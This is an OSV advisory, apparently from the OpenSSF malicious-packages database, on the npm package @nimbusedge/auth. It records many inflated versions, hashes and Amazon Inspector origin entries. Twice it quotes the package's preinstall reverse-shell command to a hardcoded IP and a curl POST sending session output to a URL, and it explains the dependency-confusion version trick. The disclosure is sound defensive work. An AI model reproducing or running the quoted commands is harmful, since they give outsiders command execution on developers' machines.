mal-2026-16132
osv_npm--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (a1c515f5cb3bfa2c20dc4fa78c4be6865209e833016cd5804b94ba5f3d1d5885) package.json declares a `preinstall` lifecycle script that runs `bash -i >& /dev/tcp/147.93.157.202/8080` to open an interactive reverse shell to the hardcoded host 147.93.157.202 on port 8080, and pipes the shell session over plain HTTP to `http://canarytokens.com/terms/7dc94zmd3so67n5vbz5bxmt7v/contact.php` via `curl -X POST --data-binary @-`. The script executes automatically on `npm install`, giving the remote endpoint interactive command execution on the installer's machine and beaconing session output to the hardcoded URL. The package is published under the scoped name `@nimbusedge/auth` at version `19999.0.6` — an artificially inflated version consistent with the dependency-confusion resolution pattern, causing internal resolvers configured against the public registry to fetch this artifact in place of a private package of the same name. The mechanism is identical to install-time remote code execution and data exfiltration regardless of any self-labeling in the package metadata.
- Published
- unknown
- Last Modified
- unknown
CVSS details not available.
No product information available.
- https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1359.6
- https://www.npmjs.com/package/@nimbusedge/auth/v/19999.0.4
- https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1337.7
- https://www.npmjs.com/package/@nimbusedge/auth/v/19999.0.7
- https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1359.5
- https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1338.1
- https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1359.3
- https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1338.5
- https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1338.3
- https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1337.6
- https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1339.4
- https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1359.2
- https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1339.1
- https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1339.3
- https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1338.4
- https://www.npmjs.com/package/@nimbusedge/auth/v/19999.0.5
- https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1360.4
- https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1337.5
- https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1339.2
- https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1338.7
- https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1359.4
- https://www.npmjs.com/package/@nimbusedge/auth/v/19999.0.3
- https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1337.1
- https://www.npmjs.com/package/@nimbusedge/auth/v/19999.0.2
- https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1360.5
- https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1360.3
- https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1338.6
- https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1337.4
- https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1338.8
- https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1359.1
- https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1339.5
- https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1360.2
- https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1337.2
- https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1337.8
- https://www.npmjs.com/package/@nimbusedge/auth/v/19999.0.1
- https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1349.5
- https://www.npmjs.com/package/@nimbusedge/auth/v/221.1.0
- https://www.npmjs.com/package/@nimbusedge/auth/v/19999.0.6
- https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1360.1
- https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1338.2
No linked vulnerabilities found.
{
"affected": [
{
"database_specific": {
"cwes": [
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
}
],
"indicators": {
"evidence_files": [
{
"path": "package.json",
"sha256": "f757183464674b6210c12224c35ede0879f274069fe6e300fd5ad6c4aecd5b5f",
"tlsh": "8fe0c034141069372cc947d17122836132b5776f4ca01c14d8c302492b1e9d92c16a48"
}
],
"package_integrity": [
{
"filename": "auth-19999.1359.6.tgz",
"hashes": {
"sha1": "287e2d832313a62227ae8126fbbd38f0e86fe2d5",
"sha512_sri": "sha512-wb5Mt7Izf9e2D0zY+qArTmoGh5Jo7dnt4yC20SCLTKbMo+XndO0VOSddl2O6DEWuVav32qxMXQHrrs1H7QFVWA=="
}
}
]
},
"source": "https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@nimbusedge/auth/MAL-2026-16132.json"
},
"package": {
"ecosystem": "npm",
"name": "@nimbusedge/auth",
"purl": "pkg:npm/%40nimbusedge/auth"
},
"versions": [
"19999.1359.6",
"19999.0.4",
"19999.1337.7",
"19999.0.7",
"19999.1359.5",
"19999.1338.1",
"19999.1359.3",
"19999.1338.5",
"19999.1338.3",
"19999.1337.6",
"19999.1339.4",
"19999.1359.2",
"19999.1339.1",
"19999.1339.3",
"19999.1338.4",
"19999.0.5",
"19999.1360.4",
"19999.1337.5",
"19999.1339.2",
"19999.1338.7",
"19999.1359.4",
"19999.0.3",
"19999.1337.1",
"19999.0.2",
"19999.1360.5",
"19999.1360.3",
"19999.1338.6",
"19999.1337.4",
"19999.1338.8",
"19999.1359.1",
"19999.1339.5",
"19999.1360.2",
"19999.1337.2",
"19999.1337.8",
"19999.0.1",
"19999.1349.5",
"221.1.0",
"19999.0.6",
"19999.1360.1",
"19999.1338.2"
]
}
],
"credits": [
{
"contact": [
"inspector-research@amazon.com"
],
"name": "Amazon Inspector",
"type": "FINDER"
}
],
"database_specific": {
"malicious-packages-origins": [
{
"id": "IN-MAL-2026-019976",
"import_time": "2026-09-11T18:21:30.822725608Z",
"modified_time": "2026-09-11T17:52:28Z",
"sha256": "0f0bb20283bd40a59feb82766057c8e98edc873f0bfc2bbaa454339bc6c89c2d",
"source": "amazon-inspector",
"versions": [
"19999.1359.6"
]
},
{
"id": "IN-MAL-2026-019986",
"import_time": "2026-09-11T18:21:31.395996995Z",
"modified_time": "2026-09-11T17:53:58Z",
"sha256": "7b14983d3d46fcffbf8c1fbad971d98662330efa1413e31e97c7de943a54f0e4",
"source": "amazon-inspector",
"versions": [
"19999.0.4"
]
},
{
"id": "IN-MAL-2026-019967",
"import_time": "2026-09-11T18:21:30.284657852Z",
"modified_time": "2026-09-11T17:51:08Z",
"sha256": "b0398f99aca1969ceee2632006edc4d324e0516b1e627b0a32b09013717ff1b9",
"source": "amazon-inspector",
"versions": [
"19999.1337.7"
]
},
{
"id": "IN-MAL-2026-019990",
"import_time": "2026-09-11T18:21:31.644641369Z",
"modified_time": "2026-09-11T17:54:32Z",
"sha256": "324a31c007d792bb911c1fd74a67f74b2878ca232bae780a8e7acb912ec28db0",
"source": "amazon-inspector",
"versions": [
"19999.0.7"
]
},
{
"id": "IN-MAL-2026-019954",
"import_time": "2026-09-11T18:21:29.70934603Z",
"modified_time": "2026-09-11T17:49:23Z",
"sha256": "4b762f73794267d3821408da0200dc64e27ce29a9970ac861504c1c2ac7fd62c",
"source": "amazon-inspector",
"versions": [
"19999.1359.5"
]
},
{
"id": "IN-MAL-2026-019965",
"import_time": "2026-09-11T18:21:30.216192269Z",
"modified_time": "2026-09-11T17:50:50Z",
"sha256": "5c597c5e6d57a72bf3783f6b3d46b983d8577cbadc48a06fcfa0659c348001a9",
"source": "amazon-inspector",
"versions": [
"19999.1338.1"
]
},
{
"id": "IN-MAL-2026-019977",
"import_time": "2026-09-11T18:21:30.862818283Z",
"modified_time": "2026-09-11T17:52:37Z",
"sha256": "853558ad92f4ec2f9930981b2276ab8faad3fb5f1ba9e6a29dfe0e5c035057ef",
"source": "amazon-inspector",
"versions": [
"19999.1359.3"
]
},
{
"id": "IN-MAL-2026-019960",
"import_time": "2026-09-11T18:21:30.016579201Z",
"modified_time": "2026-09-11T17:50:12Z",
"sha256": "ac6c00f6dc2124468b8156b9ceca71890c762fc2c19620a6de67ea0b36afbfd3",
"source": "amazon-inspector",
"versions": [
"19999.1338.5"
]
},
{
"id": "IN-MAL-2026-019983",
"import_time": "2026-09-11T18:21:31.229886203Z",
"modified_time": "2026-09-11T17:53:29Z",
"sha256": "b01f48b206d7698522815281d87a3c380cf4082420dd15a4de6e2aae623edc3b",
"source": "amazon-inspector",
"versions": [
"19999.1338.3"
]
},
{
"id": "IN-MAL-2026-019968",
"import_time": "2026-09-11T18:21:30.404519303Z",
"modified_time": "2026-09-11T17:51:17Z",
"sha256": "d1a82ac5375da171566e3e750fa4445edae82dc409b048a16f14098042f686ce",
"source": "amazon-inspector",
"versions": [
"19999.1337.6"
]
},
{
"id": "IN-MAL-2026-019961",
"import_time": "2026-09-11T18:21:30.04799622Z",
"modified_time": "2026-09-11T17:50:19Z",
"sha256": "d9e5b0b6241af6935a6c4f781934ea9059000cb93bf28a48449132e429f4613a",
"source": "amazon-inspector",
"versions": [
"19999.1339.4"
]
},
{
"id": "IN-MAL-2026-019957",
"import_time": "2026-09-11T18:21:29.883221496Z",
"modified_time": "2026-09-11T17:49:44Z",
"sha256": "30652cef6105a2c4877f440b9a95fb973ee85efb1d38a57358fb94e2fcde1b63",
"source": "amazon-inspector",
"versions": [
"19999.1359.2"
]
},
{
"id": "IN-MAL-2026-019980",
"import_time": "2026-09-11T18:21:31.045827156Z",
"modified_time": "2026-09-11T17:53:05Z",
"sha256": "4826bdd8b6d9b4987a09337704b464059d53badfe3b1c7671d582aea8f6b40f2",
"source": "amazon-inspector",
"versions": [
"19999.1339.1"
]
},
{
"id": "IN-MAL-2026-019979",
"import_time": "2026-09-11T18:21:30.958275074Z",
"modified_time": "2026-09-11T17:52:56Z",
"sha256": "9177bbdd2e74bde02414abef9051bd54cd508eb69eec3347adabc4758cb70fc5",
"source": "amazon-inspector",
"versions": [
"19999.1339.3"
]
},
{
"id": "IN-MAL-2026-019964",
"import_time": "2026-09-11T18:21:30.170772299Z",
"modified_time": "2026-09-11T17:50:43Z",
"sha256": "a2e8d6814dd637a8927342f47828fcda377aa999ef400868bd4b7eb169eb9b5a",
"source": "amazon-inspector",
"versions": [
"19999.1338.4"
]
},
{
"id": "IN-MAL-2026-019991",
"import_time": "2026-09-11T18:21:31.709735095Z",
"modified_time": "2026-09-11T17:54:41Z",
"sha256": "a2ec45ed03cdff93ba2973154358d55372c5c3b67fbe52d7b5b39fe77b8cc936",
"source": "amazon-inspector",
"versions": [
"19999.0.5"
]
},
{
"id": "IN-MAL-2026-019972",
"import_time": "2026-09-11T18:21:30.620611711Z",
"modified_time": "2026-09-11T17:51:56Z",
"sha256": "f824bcdc8aa0893373ad3e3ae1f6ed01311672c8106e0346881b4785a0342f1b",
"source": "amazon-inspector",
"versions": [
"19999.1360.4"
]
},
{
"id": "IN-MAL-2026-019956",
"import_time": "2026-09-11T18:21:29.793861271Z",
"modified_time": "2026-09-11T17:49:37Z",
"sha256": "6000241095d57a4914b76a0b7fec0d4c4fc5c8b74db0d5972432948f1b162f63",
"source": "amazon-inspector",
"versions": [
"19999.1337.5"
]
},
{
"id": "IN-MAL-2026-019962",
"import_time": "2026-09-11T18:21:30.084253959Z",
"modified_time": "2026-09-11T17:50:26Z",
"sha256": "afc290a2e8aacd5a20af3208707f9f32b462454ff75f4fa255831d83df36af07",
"source": "amazon-inspector",
"versions": [
"19999.1339.2"
]
},
{
"id": "IN-MAL-2026-019963",
"import_time": "2026-09-11T18:21:30.138405734Z",
"modified_time": "2026-09-11T17:50:35Z",
"sha256": "d2deba215f40aae214e850cfcf784506392d7f1a8208e6233d32f0be4f5f4a97",
"source": "amazon-inspector",
"versions": [
"19999.1338.7"
]
},
{
"id": "IN-MAL-2026-019975",
"import_time": "2026-09-11T18:21:30.760901946Z",
"modified_time": "2026-09-11T17:52:21Z",
"sha256": "2856142af2c8fd7d4e67adc2c75c3147cb70051327ea5446725d74827f9f6ee9",
"source": "amazon-inspector",
"versions": [
"19999.1359.4"
]
},
{
"id": "IN-MAL-2026-019987",
"import_time": "2026-09-11T18:21:31.479002809Z",
"modified_time": "2026-09-11T17:54:06Z",
"sha256": "38afcbc836ed5dd03c6718895106f0e72300a1310bb68442ee8afc9ce70e259a",
"source": "amazon-inspector",
"versions": [
"19999.0.3"
]
},
{
"id": "IN-MAL-2026-019973",
"import_time": "2026-09-11T18:21:30.660502605Z",
"modified_time": "2026-09-11T17:52:05Z",
"sha256": "99c35d38f6d9d7657a647e168297a9c87c6da4221ef5d0a9ad0bcc528c9cff5a",
"source": "amazon-inspector",
"versions": [
"19999.1337.1"
]
},
{
"id": "IN-MAL-2026-019988",
"import_time": "2026-09-11T18:21:31.545880617Z",
"modified_time": "2026-09-11T17:54:14Z",
"sha256": "be1173da1957e07ff521d9ef886309b67aef47e14aa8431647b7bf1abe5afd60",
"source": "amazon-inspector",
"versions": [
"19999.0.2"
]
},
{
"id": "IN-MAL-2026-019971",
"import_time": "2026-09-11T18:21:30.547582793Z",
"modified_time": "2026-09-11T17:51:43Z",
"sha256": "110a786757cf3a1acaf37496c565f391c0c9b50077b1ce8690e5800ff62d6e33",
"source": "amazon-inspector",
"versions": [
"19999.1360.5"
]
},
{
"id": "IN-MAL-2026-019958",
"import_time": "2026-09-11T18:21:29.938239661Z",
"modified_time": "2026-09-11T17:49:53Z",
"sha256": "1204d8fa3ac4200cc68b1d340e387a999ea22fe2e5e0df4dceeda009ba375375",
"source": "amazon-inspector",
"versions": [
"19999.1360.3"
]
},
{
"id": "IN-MAL-2026-019982",
"import_time": "2026-09-11T18:21:31.152661036Z",
"modified_time": "2026-09-11T17:53:22Z",
"sha256": "3ac718bb6440a9b1628abd22d6b0add478e11da70632a1c844926bdef98ebb73",
"source": "amazon-inspector",
"versions": [
"19999.1338.6"
]
},
{
"id": "IN-MAL-2026-019969",
"import_time": "2026-09-11T18:21:30.437854458Z",
"modified_time": "2026-09-11T17:51:25Z",
"sha256": "553b6cc69be50c17cf94451289592a2a31999aaccd44251864090b7ab1f9474e",
"source": "amazon-inspector",
"versions": [
"19999.1337.4"
]
},
{
"id": "IN-MAL-2026-019981",
"import_time": "2026-09-11T18:21:31.080339365Z",
"modified_time": "2026-09-11T17:53:12Z",
"sha256": "5c3e44480a4652fa6ddc776a7cec89a90db9b490bc8bb3583734da1d91a7b705",
"source": "amazon-inspector",
"versions": [
"19999.1338.8"
]
},
{
"id": "IN-MAL-2026-019978",
"import_time": "2026-09-11T18:21:30.901879954Z",
"modified_time": "2026-09-11T17:52:50Z",
"sha256": "97c61d0debee1d9391fc673576fc6292e26e22e5627f4cd9e3555d00acb9d808",
"source": "amazon-inspector",
"versions": [
"19999.1359.1"
]
},
{
"id": "IN-MAL-2026-019955",
"import_time": "2026-09-11T18:21:29.746194247Z",
"modified_time": "2026-09-11T17:49:30Z",
"sha256": "e87d8d62d906ee35f0984e455d2c4a044ceb760a9bafab7e3fced8a7a75cf810",
"source": "amazon-inspector",
"versions": [
"19999.1339.5"
]
},
{
"id": "IN-MAL-2026-019974",
"import_time": "2026-09-11T18:21:30.723656284Z",
"modified_time": "2026-09-11T17:52:13Z",
"sha256": "48162864236ba12ada9b9384d64d63c49efa7aec55757d9b784a1877a6eade64",
"source": "amazon-inspector",
"versions": [
"19999.1360.2"
]
},
{
"id": "IN-MAL-2026-019970",
"import_time": "2026-09-11T18:21:30.474533698Z",
"modified_time": "2026-09-11T17:51:34Z",
"sha256": "4b3bc7282aad2d14257c112647e674b69069ced2dce44df0c7fc8e932ec29fc1",
"source": "amazon-inspector",
"versions": [
"19999.1337.2"
]
},
{
"id": "IN-MAL-2026-019966",
"import_time": "2026-09-11T18:21:30.249407114Z",
"modified_time": "2026-09-11T17:51:01Z",
"sha256": "f49613a9a00f82ac4b1c2f3987f2114febc177642b78e6ad71a388c649f9bafc",
"source": "amazon-inspector",
"versions": [
"19999.1337.8"
]
},
{
"id": "IN-MAL-2026-019992",
"import_time": "2026-09-11T18:21:31.748182304Z",
"modified_time": "2026-09-11T17:54:48Z",
"sha256": "fd1faf2402b6e837df297ba0e49bc97e10b72a507e71ce9133c63c25cf1ae780",
"source": "amazon-inspector",
"versions": [
"19999.0.1"
]
},
{
"id": "IN-MAL-2026-019959",
"import_time": "2026-09-11T18:21:29.977107926Z",
"modified_time": "2026-09-11T17:50:02Z",
"sha256": "273dbcb1fb6283bedc49e856fa33eb70215fcadc69320f681e8e1abe7a0b0ab0",
"source": "amazon-inspector",
"versions": [
"19999.1349.5"
]
},
{
"id": "IN-MAL-2026-019999",
"import_time": "2026-09-11T18:21:32.091284455Z",
"modified_time": "2026-09-11T17:55:43Z",
"sha256": "584302c5da59df05ff54273e32719c5569946d99f45ad2283a1a203d3ce598c4",
"source": "amazon-inspector",
"versions": [
"221.1.0"
]
},
{
"id": "IN-MAL-2026-019984",
"import_time": "2026-09-11T18:21:31.293361277Z",
"modified_time": "2026-09-11T17:53:41Z",
"sha256": "a1c515f5cb3bfa2c20dc4fa78c4be6865209e833016cd5804b94ba5f3d1d5885",
"source": "amazon-inspector",
"versions": [
"19999.0.6"
]
},
{
"id": "IN-MAL-2026-019989",
"import_time": "2026-09-11T18:21:31.611348088Z",
"modified_time": "2026-09-11T17:54:22Z",
"sha256": "a23bacf4d0264e0ae72e14b20c5ee3f14466580e4ff8321dde7ff67b3cf223f9",
"source": "amazon-inspector",
"versions": [
"19999.1360.1"
]
},
{
"id": "IN-MAL-2026-019985",
"import_time": "2026-09-11T18:21:31.344263814Z",
"modified_time": "2026-09-11T17:53:49Z",
"sha256": "c7a691d65630e05013b3561a30a054392f434588f2cf21908c5bb97a017b51e3",
"source": "amazon-inspector",
"versions": [
"19999.1338.2"
]
}
]
},
"details": "\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (a1c515f5cb3bfa2c20dc4fa78c4be6865209e833016cd5804b94ba5f3d1d5885)\npackage.json declares a `preinstall` lifecycle script that runs `bash -i >& /dev/tcp/147.93.157.202/8080` to open an interactive reverse shell to the hardcoded host 147.93.157.202 on port 8080, and pipes the shell session over plain HTTP to `http://canarytokens.com/terms/7dc94zmd3so67n5vbz5bxmt7v/contact.php` via `curl -X POST --data-binary @-`. The script executes automatically on `npm install`, giving the remote endpoint interactive command execution on the installer's machine and beaconing session output to the hardcoded URL. The package is published under the scoped name `@nimbusedge/auth` at version `19999.0.6` — an artificially inflated version consistent with the dependency-confusion resolution pattern, causing internal resolvers configured against the public registry to fetch this artifact in place of a private package of the same name. The mechanism is identical to install-time remote code execution and data exfiltration regardless of any self-labeling in the package metadata.\n",
"id": "MAL-2026-16132",
"modified": "2026-09-11T18:45:05.087112979Z",
"published": "2026-09-11T17:49:23Z",
"references": [
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1359.6"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/@nimbusedge/auth/v/19999.0.4"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1337.7"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/@nimbusedge/auth/v/19999.0.7"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1359.5"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1338.1"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1359.3"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1338.5"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1338.3"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1337.6"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1339.4"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1359.2"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1339.1"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1339.3"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1338.4"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/@nimbusedge/auth/v/19999.0.5"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1360.4"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1337.5"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1339.2"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1338.7"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1359.4"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/@nimbusedge/auth/v/19999.0.3"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1337.1"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/@nimbusedge/auth/v/19999.0.2"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1360.5"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1360.3"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1338.6"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1337.4"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1338.8"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1359.1"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1339.5"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1360.2"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1337.2"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1337.8"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/@nimbusedge/auth/v/19999.0.1"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1349.5"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/@nimbusedge/auth/v/221.1.0"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/@nimbusedge/auth/v/19999.0.6"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1360.1"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/@nimbusedge/auth/v/19999.1338.2"
}
],
"schema_version": "1.9.0",
"summary": "Malicious code in @nimbusedge/auth (npm)"
}